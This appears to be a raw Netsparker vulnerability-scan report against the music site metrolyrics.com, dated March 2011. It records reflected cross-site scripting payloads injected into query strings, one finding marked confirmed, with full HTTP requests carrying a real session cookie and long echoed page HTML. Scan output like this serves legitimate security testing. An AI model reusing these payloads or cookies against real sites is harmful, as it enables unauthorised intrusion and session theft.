<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460911?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/373707204RihannaProfile.jpg" alt="Rihanna" width="166" />
<h2><a href="rihanna-overview.html" title="Rihanna Overview">Rihanna</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=373707204" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/rihanna/373707204/0">
<li><a title="Rihanna Overview" href="/rihanna-overview.html" >Overview</a></li>
<li><a title="Rihanna News" href="/rihanna-gossip-news.html" >News</a></li>
<li><a title="Rihanna Awards" href="/rihanna-awards-featured.html" >Awards</a></li>
<li><a title="Rihanna Albums" href="/rihanna-albums-list.html" >Albums</a></li>
<li><a title="Rihanna Lyrics" href="/rihanna-lyrics.html" >Lyrics</a></li>
<li><a title="Rihanna Videos" href="/rihanna-music-videos.html" >Videos</a></li>
<li><a title="Rihanna Pictures" href="/rihanna-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460911?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio" name="poll" value="5_19" />No! But I will...</li><li><input type="radio&qu..
- /2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html

/2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html CONFIRMED

http://www.metrolyrics.com/2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html?'"-..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00079D)</script>

Request

GET /2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html?'"--></style></script><script>netsparker(0x00079D)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 9692
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:57 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Carl Barat says Libertines won&#039;t perform at Glastonbury News about Carl Barat" />
<meta name="keywords" content="Carl Barat says Libertines won&#039;t perform at Glastonbury" />
<meta property="fb:page_id" content="81914997331" />
<title>CARL BARAT SAYS LIBERTINES WON&#039;T PERFORM AT GLASTONBURY</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Carl Barat","sectionURL":"carl-barat-lyrics.html","title":"Carl Barat says Libertines won&#039;t perform at Glastonbury"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460917?"></script>

<div id="header">

<h1>Carl Barat says Libertines won&#039;t perform at Glastonbury</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460917?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/maf.gif" alt="Carl Barat" width="166" />
<h2><a href="carl-barat-overview.html" title="Carl Barat Overview">Carl Barat</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=1298501804" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/carl-barat/1298501804/0">
<li><a title="Carl Barat Overview" href="/carl-barat-overview.html" >Overview</a></li>
<li><a title="Carl Barat News" href="/carl-barat-gossip-news.html" >News</a></li>
<li><a title="Carl Barat Awards" href="/carl-barat-awards-featured.html" >Awards</a></li>
<li><a title="Carl Barat Albums" href="/carl-barat-albums-list.html" >Albums</a></li>
<li><a title="Carl Barat Lyrics" href="/carl-barat-lyrics.html" >Lyrics</a></li>
<li><a title="Carl Barat Videos" href="/carl-barat-music-videos.html" >Videos</a></li>
<li><a title="Carl Barat Pictures" href="/carl-barat-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460917?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />..
- /top-artists.html

/top-artists.html

http://www.metrolyrics.com/top-artists.html?'"--></style></script><script>alert(0x00021F)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00021F)</script>

Request

GET /top-artists.html?'"--></style></script><script>netsparker(0x00021F)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 25385
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:14:37 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=;sz=1x1;ord=1299460477?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=;sz=728x90;ord=1299460477?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" class="on">Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" >Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" >Rock</a></li>
